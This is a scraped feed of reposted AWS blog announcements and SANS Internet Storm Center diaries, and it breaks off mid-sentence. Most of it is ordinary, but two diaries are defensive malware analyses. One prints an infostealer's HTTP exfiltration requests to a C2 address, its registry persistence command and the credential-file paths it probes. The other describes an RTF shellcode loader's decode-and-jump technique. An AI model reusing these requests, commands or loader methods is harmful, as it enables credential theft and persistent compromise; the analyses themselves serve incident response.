CloudWatch Metric Streams – Send AWS Metrics to Partners and to Your Apps in Real Time

This post was originally published on this site

When we launched Amazon CloudWatch back in 2009 (New Features for Amazon EC2: Elastic Load Balancing, Auto Scaling, and Amazon CloudWatch), it tracked performance metrics (CPU load, Disk I/O, and network I/O) for EC2 instances, rolled them up at one-minute intervals, and stored them for two weeks. At that time it was used to monitor instance health and to drive Auto Scaling. Today, CloudWatch is a far more comprehensive and sophisticated service. Some of the most recent additions include metrics with 1-minute granularity for all EBS volume types, CloudWatch Lambda Insights, and the Metrics Explorer.

AWS Partners have used the CloudWatch metrics to create all sorts of monitoring, alerting, and cost management tools. In order to access the metrics the partners created polling fleets that called the ListMetrics and GetMetricDatafunctions for each of their customers.

These fleets must scale in proportion to the number of AWS resources created by each of the partners’ customers and the number of CloudWatch metrics that are retrieved for each resource. This polling is simply undifferentiated heavy lifting that each partner must do. It adds no value, and takes precious time that could be better invested in other ways.

New Metric Streams
CloudWatch Side Menu (Dashboards, Alarms, Metrics, and more)In order to make it easier for AWS Partners and others to gain access to CloudWatch metrics faster and at scale, we are launching CloudWatch Metric Streams. Instead of polling (which can result in 5 to 10 minutes of latency), metrics are delivered to a Kinesis Data Firehose stream. This is highly scalable and far more efficient, and supports two important use cases:

Partner Services – You can stream metrics to a Kinesis Data Firehose that writes data to an endpoint owned by an AWS Partner. This allows partners to scale down their polling fleets substantially, and lets them build tools that can respond more quickly when key cost or performance metrics change in unexpected ways.

Data Lake – You can stream metrics to a Kinesis Data Firehose of your own. From there you can apply any desired data transformations, and then push the metrics into Amazon Simple Storage Service (S3) or Amazon Redshift. You then have the full array of AWS analytics tools at your disposal: S3 Select, Amazon SageMaker, Amazon EMR, Amazon Athena, Amazon Kinesis Data Analytics, and more. Our customers do this to combine billing and performance data in order to measure & improve cost optimization, resource performance, and resource utilization.

CloudWatch Metric Streams are fully managed and very easy to set up. Streams can scale to handle any volume of metrics, with delivery to the destination within two or three minutes. You can choose to send all available metrics to each stream that you create, or you can opt-in to any of the available AWS (EC2, S3, and so forth) or custom namespaces.

Once a stream has been set up, metrics start to flow within a minute or two. The flow can be stopped and restarted later if necessary, which can be handy for testing and debugging. When you set up a stream you choose between the binary Open Telemetry 0.7 format, and the human-readable JSON format.

Each Metric Stream resides in a particular AWS region and delivers metrics to a single destination. If you want to deliver metrics to multiple partners, you will need to create a Metric Stream for each one. If you are creating a centralized data lake that spans multiple AWS accounts and/or regions, you will need to set up some IAM roles (see Controlling Access with Amazon Kinesis Data Firehose for more information).

Creating a Metric Stream
Let’s take a look at two ways to use a Metric Stream. First, I will use the Quick S3 setup option to send data to a Kinesis Data Firehose and from there to S3. Second, I will use a Firehose that writes to an endpoint at AWS Partner New Relic.

I open the CloudWatch Console, select the desired region, and click Streams in the left-side navigation. I review the page, and click Create stream to proceed:

CloudWatch Metric Streams Home Page in Console

I choose the metrics to stream. I can select All metrics and then exclude those that I don’t need, or I can click Selected namespaces and include those that I need. I’ll go for All, but exclude Firehose:

Create a Metric Stream - Part 1, All or Selected

I select Quick S3 setup, and leave the other configuration settings in this section unchanged (I expanded it so that you could see all of the options that are available to you):

Create a Metric Stream - Options for S3 bucket and IAM roles

Then I enter a name (MyMetrics-US-East-1A) for my stream, confirm that I understand the resources that will be created, and click Create metric stream:

Set name for Metric Stream and confirm resources to be created

My stream is created and active within seconds:

Metric Stream is Active

Objects begin to appear in the S3 bucket within a minute or two:

Objects appear in S3 Bucket

I can analyze my metrics using any of the tools that I listed above, or I can simply look at the raw data:

A single Metrics object, shown in NotePad++, JSON format

Each Metric Stream generates its own set of CloudWatch metrics:

Metrics for the metrics stream

I can stop a running stream:

How to stop a running stream

And then start it:

How to start a stopped stream

I can also create a Metric Stream using a CloudFormation template. Here’s an excerpt:

AWSTemplateFormatVersion: 2010-09-09
    Type: 'AWS::CloudWatch::MetricStream'
      OutputFormat: json
      RoleArn: !GetAtt
        - MetricStreamToFirehoseRole
        - Arn
      FirehoseArn: !GetAtt
        - FirehoseToS3Bucket
        - Arn

Now let’s take a look at the Partner-style use case! The team at New Relic set me up with a CloudFormation template that created the necessary IAM roles and the Metric Stream. I simply entered my API key and an S3 bucket name and the template did all of the heavy lifting. Here’s what I saw:

Metrics displayed in the New Relic UI

Things to Know
And that’s about it! Here are a couple of things to keep in mind:

Regions – Metric Streams are now available in all commercial AWS Regions, excluding the AWS China (Beijing) Region and the AWS China (Ningxia) Region. As noted earlier, you will need to create a Metric Stream in each desired account and region (this is a great use case for CloudFormation Stacksets).

Pricing – You pay $0.003 for every 1000 metric updates, and for any charges associated with the Kinesis Data Firehose. To learn more, check out the pricing page.

Metrics – CloudWatch Metric Streams is compatible with all CloudWatch metrics, but does not send metrics that have a timestamp that is more than two hours old. This includes S3 daily storage metrics and some of the billing metrics.

Partner Services
We designed this feature with the goal of making it easier & more efficient for AWS Partners including Datadog, Dynatrace, New Relic, Splunk, and Sumo Logic to get access to metrics so that the partners can build even better tools. We’ve been working with these partners to help them get started with CloudWatch Metric Streams. Here are some of the blog posts that they wrote in order to share their experiences. (I am updating this article with links as they are published.)

Now Available
CloudWatch Metric Streams is available now and you can use it to stream metrics to a Kinesis Data Firehose of your own or an AWS Partners. For more information, check out the documentation and send feedback to the AWS forum for Amazon CloudWatch.


Quick Analysis of a Modular InfoStealer, (Wed, Mar 31st)

This post was originally published on this site

This morning, an interesting phishing email landed in my spam trap. The mail was redacted in Spanish and, as usual, asked the recipient to urgently process the attached document. The filename was "AVISO.001" (This extension is used by multi-volume archives). The archive contained a PE file with a very long name: AVISO11504122921827776385010767000154304736120425314155656824545860211706529881523930427.exe (SHA256:ff834f404b977a475ef56f1fa81cf91f0ac7e07b8d44e0c224861a3287f47c8c). The file is unknown on VT at this time so I did a quick analysis.

It first performs a quick review of the target and exfiltrates the collected information:

POST /7Ndd3SnW/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176[.]111[.]174[.]67
Content-Length: 83
Cache-Control: no-cache


You can see the name of the computer ("pc="), the user ("un="). No AV is running (av=0). There is an ID (randomly generated) and a version of the malware or campaign? ("vs=").

The next step is to drop itself into C:ProgramData11ab573a3rween.exe. This malware is modular and downloads two DLLs located on the C2 server:

Those DLLs are known on VT [1][2]:

remnux@remnux:/MalwareZoo/20210331$ shasum -a 256 *.dll
6f917b86c623a4ef2326de062cb206208b25d93f6d7a2911bc7c10f7c83ffd64  cred.dll
3d0efa67d54ee1452aa53f35db5552fe079adfd14f1fe312097b266943dd9644  scr.dll

Persistence is achieved via a new registry key. Any shortcut created to the location pointed by a subkey Startup will launch the service during logon/reboot.

"C:WindowsSystem32cmd.exe" /C REG ADD "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /f /v Startup /t REG_SZ /d C:ProgramData11ab573a3

DLLs are not loaded into the main program with LoadLibrary() but there are launched from rundll32:

"C:WindowsSystem32rundll32.exe" C:ProgramData5eba991cccd123cred.dll, Main
"C:WindowsSystem32rundll32.exe" C:ProgramData5eba991cccd123scr.dll, Main

Once the DLLs are launched, the exfiltration of data starts:

cred.dll is responsible for searching credentials. Example of probes detected:

  • Outlook (HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesOutlook)
  • FileZilla (C:Usersuser01AppDataRoamingFileZillasitemanager.xml)
  • Purple (C:Usersuser01AppDataRoaming.purpleaccounts.xml)

Data is then exfiltrated:

POST //7Ndd3SnW/index.php HTTP/1.1
Content-Length: 21
Content-Type: application/x-www-form-urlencoded


(In my sandbox, my credentials was available)

scr.dll is used to take screenshots at regular interval and also exfiltrate them:

POST //7Ndd3SnW/index.php?scr=up HTTP/1.1
User-Agent: Uploador
Content-Type: multipart/form-data; boundary=152140224449.jpg
Connection: Keep-Alive
Content-Length: 34758

Content-Disposition: form-data; name="data"; filename="152140224449.jpg"
Content-Type: application/octet-stream

......JFIF.............C.......... (data removed)

Note the nice User-Agent: "Uploador". I found references to this string back in 2015![3].

Here is a screenshot of the C2 panel, a good old Amadey:

Even if the malware looks old-fashioned, it remains effective and already made some victims. I found a lot of screenshots (461) on the C2 server:


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Troubleshoot Boot and Networking Issues with New EC2 Serial Console

This post was originally published on this site

Fixing production issues is one of the key responsibilities of system and network administrators. In fact, I’ve always found it to be one of the most interesting parts of infrastructure engineering. Diving as deep as needed into the problem at hand, not only do you (eventually) have the satisfaction of solving the issue, you also learn a lot of things along the way, which you probably wouldn’t have been exposed to under normal circumstances.

Operating systems certainly present such opportunities. Over time, they’ve grown ever more complex, forcing administrators to master a zillion configuration files and settings. Although infrastructure as code and automation have greatly improved provisioning and managing servers, there’s always room for mistakes and breakdowns that prevent a system from starting correctly. The list is endless: missing hardware drivers, misconfigured file systems, invalid network configuration, incorrect permissions, and so on. To make things worse, many issues can effectively lock administrators out of a system, preventing them from logging in, diagnosing the problem and applying the appropriate fix. The only option is to have an out-of-band connection to your servers, and although customers could view the console output of an EC2 instance, they couldn’t interact with it – until now.

Today, I’m extremely happy to announce the EC2 Serial Console, a simple and secure way to troubleshoot boot and network connectivity issues by establishing a serial connection to your Amazon Elastic Compute Cloud (EC2) instances.

Introducing the EC2 Serial Console
EC2 Serial Console access is available for EC2 instances based on the AWS Nitro System. It supports all major Linux distributions, FreeBSD, NetBSD, Microsoft Windows, and VMWare.

Without any need for a working network configuration, you can connect to an instance using either a browser-based shell in the AWS Management Console, or an SSH connection to a managed console server. No need for an sshd server to be running on your instance: the only requirement is that the root account has been assigned a password, as this is the one you will use to log in. Then, you can enter commands as if you have a keyboard and monitor directly attached to one of the instance’s serial ports.

In addition, you can trigger operating system specific procedures:

  • On Linux, you can trigger a Magic SysRq command to generate a crash dump, kill processes, and so on.
  • On Windows, you can interrupt the boot process, and boot in safe mode using Emergency Management Service (EMS) and Special Admin Console (SAC).

Getting access to an instance’s console is a privileged operation that should be tightly controlled, which is why EC2 Serial Console access is not permitted by default at the account level. Once you permit access in your account, it applies to all instances in this account. Administrators can also apply controls at the organization level thanks to Service Control Policies, and at instance level thanks to AWS Identity and Access Management (IAM) permissions. As you would expect, all communication with the EC2 Serial Console is encrypted, and we generate a unique key for each session.

Let’s do a quick demo with Linux. The process is similar with other operating systems.

Connecting to the EC2 Serial Console with the AWS Management Console
First, I launch an Amazon Linux 2 instance. Logging in to it, I decide to mangle the network configuration for its Ethernet network interface (/etc/sysconfig/network-scripts/ifcfg-eth0), setting a completely bogus static IP address. PLEASE do not try this on a production instance!

Then, I reboot the instance. A few seconds later, although the instance is up and running in the EC2 console and port 22 is open in its Security Group, I’m unable to connect to it with SSH.

$ ssh -i ~/.ssh/mykey.pem
ssh: connect to host port 22: Operation timed out

EC2 Serial Console to the rescue!

First, I need to allow console access in my account. All it takes is ticking a box in the EC2 settings.

Enabling the console

Then, right clicking on the instance’s name in the EC2 console, I select Monitor and troubleshoot; then EC2 Serial Console.

This opens a new window confirming the instance id and the serial port number to connect to. I simply click on Connect.

This opens a new tab in my browser. Hitting Enter, I see the familiar login prompt.

Amazon Linux 2
Kernel 4.14.225-168.357.amzn2.x86_64 on an x86_64
ip-172-31-67-148 login:

Logging in as root, I’m relieved to get a friendly shell prompt.

Enabling Magic SysRq for this session (sysctl -w kernel.sysrq=1), I first list available commands (CTRL-0 + h), and then ask for a memory report (CTRL-0 + m). You can click on the image below to get a larger view.

Connecting to the console

Pretty cool! This would definitely come in handy to troubleshoot complex issues. No need for this here: I quickly restore a valid configuration for the network interface, and I restart the network stack.

Trying to connect to the instance again, I can see that the problem is solved.

$ ssh -i ~/.ssh/mykey.pem

__|   __|_  )
_|   (    / Amazon Linux 2 AMI
[ec2-user@ip-172-31-67-148 ~]$

Now, let me quickly show you the equivalent commands using the AWS command line interface.

Connecting to the EC2 Serial Console with the AWS CLI
This is equally simple. First, I send the SSH public key for the instance key pair to the serial console. Please make sure to add the file:// prefix.

$ aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-003aecec198b537b0 --ssh-public-key file://~/.ssh/ --serial-port 0 --region us-east-1

Then, I ssh to the serial console, using <instance id>.port<port number> as user name, and I’m greeted with a login prompt.

$ ssh -i ~/.ssh/mykey.pem

Amazon Linux 2
Kernel 4.14.225-168.357.amzn2.x86_64 on an x86_64
ip-172-31-67-148 login:

Once I’ve logged in, Magic SysRq is available, and I can trigger it with ~B+command. I can also terminate the console session with ~..

Get Started with EC2 Serial Console
As you can see, the EC2 Serial Console makes it much easier to debug and fix complex boot and network issues happening on your EC2 instances. You can start using it today in the following AWS regions, at no additional cost:

  • US East (N. Virginia), US West (Oregon), US East (Ohio)
  • Europe (Ireland), Europe (Frankfurt)
  • Asia Pacific (Tokyo), Asia Pacific (Sydney), Asia Pacific (Singapore)

Please give it a try, and let us know what you think. We’re always looking forward to your feedback! You can send it through your usual AWS Support contacts, or on the AWS Forum for Amazon EC2.

– Julien



Old TLS versions – gone, but not forgotten… well, not really "gone" either, (Tue, Mar 30th)

This post was originally published on this site

With the recent official deprecation of TLS 1.0 and TLS 1.1 by RFC 8996[1], a step, which has long been in preparation and which was preceded by many recommendations to discontinue the use of both protocols (as well as by the removal of support for them from all mainstream web browsers[2]), one might assume that the use of old TLS versions on the internet would have significantly decreased over the last few months. This has however not been the case.

According to Shodan, at the time of writing, TLS 1.0 and TLS 1.1 are still supported by over 50% of web servers on the internet (50.15% and 50.08% respectively). We’ll leave aside the potentially much more problematic 7.2% of web servers that still support SSL 3.0 and 1.6% of servers that support SSL 2.0…

What is interesting about the percentages for TLS 1.0 and TLS 1.1 is that both are almost the same as they were six months ago. As the following chart shows, there appeared to be a fairly significant decrease in support of both protocols between the second half of October 2020 and the end of January 2021, which was however followed by a later sharp increase, after which the percentages plateaued at around the current values.

The still significant support for TLS 1.1 and TLS 1.0 is hardly too big a problem, since, although these protocols can’t be called “secure” by today’s standards, most browsers won’t use them unless specifically configured to do so. The fact that the percentage of publicly accessible web servers, which still support the historical TLS versions, didn’t decrease significantly in the last six months is, however, certainly noteworthy.

To end on a positive note, TLS 1.3 is now supported by over 25% of web servers (25.22% to be specific), as you may have noticed in the first chart. It seems that even if old TLS versions will not leave us any time soon, support for the new and secure version of the protocol is certainly slowly increasing[3].


Jan Kopriva
Alef Nula

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Jumping into Shellcode, (Mon, Mar 29th)

This post was originally published on this site

Malware analysis is exciting because you never know what you will find. In previous diaries[1], I already explained why it's important to have a look at groups of interesting Windows API call to detect some behaviors. The classic example is code injection. Usually, it is based on something like this:

1. You allocate some memory
2. You get a shellcode (downloaded, extracted from a specific location like a section, a resource, …)
3. You copy the shellcode in the newly allocated memory region
4. You create a new threat to execute it.

But it's not always like this! Last week, I worked on an incident involving a malicious DLL that I analyzed. The technique used to execute the shellcode was slightly different and therefore interesting to describe it here.

The DLL was delivered on the target system with an RTF document. This file contained the shellcode:

remnux@remnux:/MalwareZoo/20210318$ suspicious.rtf
    1 Level  1        c=    3 p=00000000 l=    1619 h=     143;       5 b=       0   u=     539 rtf1
    2  Level  2       c=    2 p=00000028 l=      91 h=       8;       2 b=       0   u=      16 fonttbl
    3   Level  3      c=    0 p=00000031 l=      35 h=       3;       2 b=       0   u=       5 f0
    4   Level  3      c=    0 p=00000056 l=      44 h=       5;       2 b=       0   u=      11 f1
    5  Level  2       c=    0 p=00000087 l=      33 h=       0;       4 b=       0   u=       2 colortbl
    6  Level  2       c=    0 p=000000ac l=      32 h=      13;       5 b=       0   u=       5 *generator
    7 Remainder       c=    0 p=00000655 l=  208396 h=   17913;       5 b=       0   u=  182176 
      Whitespace = 4878  NULL bytes = 838  Left curly braces = 832  Right curly braces = 818

This file is completely valid from an RTF format point of view, will open successfully, and render a fake document. But the attacker appended the shellcode at the end of the file (have a look at stream 7 which has a larger size and a lot of unexpected characters ("u="). Let's try to have a look at the shellcode:

remnux@remnux:/MalwareZoo/20210318$ suspicious.rtf -s 7 | head -20
00000000: 0D 0A 00 6E 07 5D A7 5E  66 D2 97 1F 65 31 FD 7E  ...n.].^f...e1.~
00000010: D9 8E 9A C4 1C FC 73 79  F0 0B DA EA 6E 06 C3 03
00000020: 27 7C BD D7 23 84 0B BD  73 0C 0F 8D F9 DF CC E7  '|..#...s.......
00000030: 88 B9 97 06 A2 F9 4D 8C  91 D1 5E 39 A2 F5 9A 7E  ......M...^9...~
00000040: 4C D6 C8 A2 2D 88 D0 C4  16 E6 2B 1C DA 7B DD F7  L...-.....+..{..
00000050: C4 FB 61 34 A6 BE 8E 2F  9D 7D 96 A8 7E 00 E2 E8  ..a4.../.}..~...
00000060: BB A2 D9 53 1C F3 49 81  77 93 30 16 11 9D 88 93  ...S..I.w.0.....
00000070: D2 6C 9D 56 60 36 66 BA  29 3E 73 45 CE 1A BE E3  .l.V`6f.)>sE....
00000080: 5A C7 96 63 E0 D7 DF C9  21 2F 56 81 BD 84 6C 2D  Z..c....!/V...l-
00000090: CF 4C 4E BE 90 23 47 DC  A7 A9 8E A2 C3 A3 2E D1  .LN..#G.........

It looks encrypted and a brute force of a single XOR encoding was not successful. Let's see how it works in a debugger.

First, the RTF file is opened to get a handle and its size is fetched with GetFileSize(). Then, a classic VirtualAlloc() is used to allocate a memory space equal to the size of the file. Note the "push 40" which means that the memory will contain executable code (PAGE_EXECUTE_READWRITE):


Usually, the shellcode is extracted from the file by reading the exact amount of bytes. The malware jumps to the position of the shellcode start in the file and reads bytes until the EOF. In this case, the complete RTF file is read then copied into the newly allocated memory:

This is the interesting part of the code which processes the shellcode:

The first line "mov word ptr ss:[ebp-18], 658" defines where the shellcode starts in the memory map. In a loop, all characters are XOR'd with a key that is generated in the function desktop.70901100. The next step is to jump to the location of the decoded shellcode:

The address where to jump is based on the address of the newly allocated memory (0x2B30000) + the offset (658). Let's have a look at this location (0x2B30658):

Sounds good, we have a NOP sled at this location + the string "MZ". Let's execute the unconditional JMP:

We reached our shellcode! Note the NOP instructions and also the method used to get the EIP:

02B30665 | E8 00000000 | call 2B3066A | call $0
02B3066A | 5B          | pop ebx      | 

Now the shellcode will execute and perform the next stages of the infection…


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TCPView v4.0 Released, (Sun, Mar 28th)

This post was originally published on this site

TCPView is a Sysinternals' tool that displays information about the TCP and UDP endpoints on a system. It's like netstat, but with a GUI.

This new version brings some major new features: service identification, creation time and searching:

Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Malware Analysis with elastic-agent and Microsoft Sandbox, (Fri, Mar 26th)

This post was originally published on this site

Microsoft describes the "Windows Sandbox supports simple configuration files, which provide a minimal set of customization parameters for Sandbox. […] Windows Sandbox configuration files are formatted as XML and are associated with Sandbox via the .wsb file extension."[6]

Since both, the latest version elastic-agent (7.11+) support antivirus detection, I followed the instructions listed here [1] to configure an agent to test its detection capabilities. For my workstation, I used VMware with a fully patched Windows 10 and saved the current configuration with a snapshot. I wanted to combine both of these features; the elastic-agent and the Microsoft sandbox feature [4][5][6] to analyze my malware sample. Since the Microsoft sandbox doesn't retain anything after it is shutdown, I figure this would be a good alternative vs. restoring my previous VMware snapshot every time I tested a suspicious filename.

One minor inconvenient, if I want to use the agent, I need to add it every time to Elasticsearch to use it. If the elastic-agent isn't installed, Microsoft Defender is enabled. Here is a list of tools to either install or consider installing in the sandbox when it starts:

  • Elastic-agent with malware policy (in VMware client and Sandbox client)
  • MS SysMon
  • MS TCPView
  • Consider adding: PowerShell Script Block Logging, example here
  • Wireshark to capture traffic from host
  • Other browsers: Chrome & Firefox
  • PeStudio
  • Python
  • Internet Services Simulation Suite: INetSim
  • Didier Stevens suite of tools
  • Proxy setup on VMware client to monitor traffic
  • Any other tools you might find useful during the analysis such as this package by @mentebinaria

When starting the sandbox, using a script configured for this purpose, it can automatically load the tools needed with a batch file (MalwareAnalysis.wsb). Here is my example:


Because everything is deleted when you shutdown the sandbox (including the browser, it must be reloaded with the current version every time), I needed a way to automatically start/add/load/update what I needed to perform some basic analysis. I use a batch file I preconfigured with everything I needed to accomplish this task. Here is what I have (C:SandboxSBConfig.bat):

REM Copy elastic-agent to C:Program Files
C:WindowsSystem32xcopy.exe /i /s C:UsersWDAGUtilityAccountDesktopSandboxelastic-agent "C:Program Fileselastic-agent"

REM Install Sysmon64, vcredist_x86
C:UsersWDAGUtilityAccountDesktopSandboxSysmon64.exe -i -accepteula
C:UsersWDAGUtilityAccountDesktopSandboxvcredist_x86.exe /q

REM Add Elastic certificate authority to Sandbox
C:WindowsSystem32certutil.exe -addstore root C:UsersWDAGUtilityAccountDesktopSandboxca.crt
C:WindowsSystem32certutil.exe -addstore root C:UsersWDAGUtilityAccountDesktopSandboxstargate.crt

REM Install new Microsoft Edge
start /wait C:UsersWDAGUtilityAccountDesktopSandboxMicrosoftEdgeEnterpriseX64.msi /quiet /norestart

REM Install Python
C:UsersWDAGUtilityAccountDesktopSandboxpython-3.9.2-amd64.exe /quiet InstallAllUsers=1 PrependPath=1 Include_test=0

REM Execute PowerShell scripts
Powershell.exe -executionpolicy remotesigned -File C:UsersWDAGUtilityAccountDesktopSandboxChangeExecutionPolicy.ps1
Powershell.exe -executionpolicy remotesigned -File C:UsersWDAGUtilityAccountDesktopSandboxScriptBlockLogging.ps1

REM Install Wireshark
REM Install npcap manually. Silent only supported with OEM
C:UsersWDAGUtilityAccountDesktopSandboxWireshark-win64-3.4.4.exe /S /D /desktopicon=yes

The file npcap is last because I'm using the free edition vs. the OEM which will ask to finish the installation after it starts the installer. Before you can enable ScriptBlockLogging in the Sandbox, I need to enable the PowerShell ExecutionPolicy to allow RemoteSigned. This is the command in my script to make that change (ChangeExecutionPolicy.ps1):

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force

To verify the change was applied, as PowerShell admin, execute the following command:

Get-ExecutionPolicy -List

Producing the following result:

Following the example listed here in this Elastic blog, it is time to create a policy, add the elastic-agent to Elasticsearch (pre-copied with the batch file SBConfig.bat) to run the sample file and monitor its activity. This is the four application part of the policy I configured for my agent:

After launching the script MalwareAnalysis.wsb to start the Sandbox, load, copy and install all the applications from the batch file, it is time to add the elastic-agent to the server, I am ready to launch the suspected malware file for analysis. Last month, my honeypot was uploaded a crypto miner file photo.scr and I'm going to use this file to submit the elastic-agent for analysis.

→ To view the results in Kibana, navigate Security -> Overview -> Detection alert trend
I look for activity that would indicate an alert triggered by malware and filter for the value, then View alerts to examine the flow of the activity. I can then select Analyze the content as to what this photo.scr file accessed or installed on the client. The agent captured 3 alerts:

Next is to expand one of those alerts and analyze the activity, the elastic-agent identified: 1 library, 53 networks and 7 registry:

Network Activty

Registry Activity

Each one of the can be expanded to drill further into what happened on the host.

Indicator of Compromise

807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d  Photo.scr
[2021-02-08 07:06:36] [1693] [ftp_21_tcp 29914] [] info: Stored 1578496 bytes of data



This is one of many tasks Windows Sandbox could be used such as accessing suspicious sites, running untrusted software and scripts starting with Windows network or vGPU disable, without the fear of impacting your normal Windows installation. These various tasks can be accomplished by creating  separate .wsb Sanbox script.


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Office macro execution evidence, (Fri, Mar 26th)

This post was originally published on this site

Microsoft Office Macros continue to be the security nightmare that they have been for the past 3 decades. System and security admins everywhere continue to try to protect their users from prevalent macro malware, but they find Microsoft's tooling often less than helpful.

Case in point, the Microsoft page that describes how to disable macros sports this useful warning:

If only life were so easy…. The only two people who will ever be "sure" what a macro is doing are its original developer, and the malware analyst who just reverse engineered it. And I'm actually even doubtful about the developer.  

Considering how shaky and often bypassed the avialable mechanisms are to control macro usage, we would expect to at least see some decent instrumentation that allows us to log, monitor and reproduce "what happened". But… no. There are hardly any useful logs. Which over the years led to a plethora of work-arounds, YARA rules, Powershell scripts, and reverse engineering. 

This week, I had the "joy" of doing a bit of the latter, while investigating an incident. One of the few places where macro execution leaves traces is in the "TrustRecords" entry in the registry:

HKCU:SOFTWAREMicrosoftOffice16.0WordSecurityTrusted DocumentsTrustRecords
HKCU:SOFTWAREMicrosoftOffice16.0ExcelSecurityTrusted DocumentsTrustRecords
HKCU:SOFTWAREMicrosoftOffice16.0PowerPointSecurityTrusted DocumentsTrustRecords

The version number (16.0) might vary depending on your Office installation. Whether, when and how the keys get populated also depends on the "Trust Center" setting as described in the Microsoft link above.

But in general, the registry entries will look something like this:


The rightmost value (00 or 7f) indicates which trust center warning the user clicked away. "00" means "Open for Editing" and "7F" means "Allow Macros to Run". The other hex values encode, amongst other data, the original creation time stamp of the file whose name is shown. This can be extremely helpful when you need to determine the exact time of original download, if the file came from a shady source. In combination with the file name, this can be the "pivot points" that you need in an incident to go hunting in proxy or email logs, to determine how that file got to the user in the first place. 

Volatility has support to extract this information, but if you are forensicating on a live system, you can also wing it with Powershell in a pinch:

$regkeys =  'HKCU:SOFTWAREMicrosoftOffice16.0WordSecurityTrusted DocumentsTrustRecords',
            'HKCU:SOFTWAREMicrosoftOffice16.0ExcelSecurityTrusted DocumentsTrustRecords',
            'HKCU:SOFTWAREMicrosoftOffice16.0PowerPointSecurityTrusted DocumentsTrustRecords'
foreach ($key in $regkeys) {
        try {$item = Get-Item $key -erroraction stop} catch { $item = "" }
        foreach ($line in $ {
            $values = $item.getvalue($line)
            if ($values[-1] -gt 0) {$type="RUN"} else {$type="EDIT"}
            $timestamp = [datetime]::FromFileTimeUtc([System.BitConverter]::ToUint64($values,0))
            Write-Output "$line $timestamp $type"

Yep, not exactly the most beautiful code. It ain't my fault that Microsoft insists on using 64bits for a time stamp, nor that converting such a value back into human readable time is so convoluted in Powershell :).

In my case, for the registry screenshot shown above, the Powershell spits out the following

%USERPROFILE%/Downloads/invoice%2058633.xls 03/24/2021 23:52:21 RUN
%USERPROFILE%/Downloads/Invoice%2038421.xls 03/22/2021 23:45:42 EDIT
%USERPROFILE%/Downloads/Invoice%2094377.xls 03/22/2021 21:02:04 EDIT

which tells me that the file I want is "invoice 58633.xls", because for it, Macros were allowed to run. It also gives me a timestamp for when the user made the download – March 24, 23:52 UTC. 

If you have savvy ways of keeping track of or analyzing macro execution in your environment, please let us know, or share in the comments below.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Submitting pfSense Firewall Logs to DShield, (Thu, Mar 25th)

This post was originally published on this site

In my previous diaries, I wrote about pfSense firewalls [1], [2]. I hope the diaries have given some insight to current pfSense users, and also inspire individuals who have yet to deploy any form of information security mechanisms in their homes/personal networks to do so. At the SANS Internet Storm Center, we welcome interested participants to submit firewall logs to DShield [3]. In this diary entry, I would like to share how to do so if you are using a pfSense firewall. I also highlight some minor issues I discovered when I was trying set up the DShield pfSense client, and how to resolve them so you can send your logs to DShield successfully. Please remember to do a config backup on your pfSense firewall before changing anything, and test the changes made in a test network before deploying them into the production environment. At this point of writing, all configuration and testing were done on pfSense 2.5.0-RELEASE Community Edition.

1) Configure pfSense E-Mail Settings
E-Mail settings inside the pfSense Notifications menu have to be enabled if you want to submit your pfSense firewall logs to DShield. To navigate to the appropriate settings page, please go to “System > Advanced > Notifications”. Figure 1 shows the corresponding screenshot, and also some sample settings if you are using Google Mail. When the corresponding details have been added, scroll down and select “Save” first. After that, click on “Test SMTP Settings” and see if you received the test e-mail. Please use the e-mail address that you have registered with the SANS Internet Storm Center.

Figure 1: SMTP Settings on pfSense (Google Mail is being used here)

Note: You have to save the details before testing the SMTP settings. There is currently a bug in pfSense that loads the wrong password if you test SMTP settings and subsequently save them [4].
If you are using Google Mail, you may get an error message about SMTP failure and that the test e-mail could not be sent. Following that, you may receive an e-mail from Google that a sign-in attempt was blocked. If you follow on the error code, it will lead to a Google Account Help page that states “Less secure app access” may have to be enabled as 2-step verification is not enabled. If you do get this, please enable 2-step verification, configure an App password to use for the E-Mail settings in pfSense, and then complete Google’s Display Unlock Captcha [5]. For a detailed explanation on how to configure an App password, it can be found here [6]. It is highly not recommended to enable less secure app access, and it is always a good security practice to use two-factor authentication (2FA) when logging in to your accounts.

2) Create a new directory to store DShield files
It was recommended that the DShield files to be put at a convenient directory (/root/bin/). In a default installation of pfSense, there is no /bin directory inside /root. As such, it has to be created manually. To do so, navigate over to the pfSense WebGUI Command Prompt. To go to the page, navigate to “Diagnostics > Command Prompt”. Type in the command mkdir /root/bin/ under the “Execute Shell Command” section. Figure 2 below shows successful execution of the command.

Figure 2: Creation of /root/bin/ directory

3) Download and edit DShield pfSense Client

It is now time to prepare 2 files that are required to be copied to your pfSense firewall – dshield.php and dshield.sample (dshield.sample will have to be renamed to dshield.ini after relevant details are filled in). They can be downloaded from Johannes Ullrich’s GitHub repository over here [7]. There are multiple ways of loading these 2 files into the firewall, such as via SSH, SCP or even via a direct curl command. However, since dshield.sample has to be modified and renamed before it can be used by dshield.php, I will be modifying the files locally on a computer before uploading them via pfSense WebGUI Command Prompt page (if you prefer to modify them directly on the firewall via SSH or direct interaction via the firewall, by all means. However, I personally prefer to finalize file edits before pushing them to the firewall). With reference to Figure 3, edit lines 4, 5 and 6 of dshield.sample with your SANS Internet Storm Center details (these can be found when you go to Please refer to Figure 4 to see the information required for Line 4 and Line 6). You will also need to edit line 13 and input the IP address that you are sending the firewall logs from (i.e. your public IP address). This is to prevent your IP address from being blocked/reported as an offender if some outgoing traffic is blocked within your network (e.g. 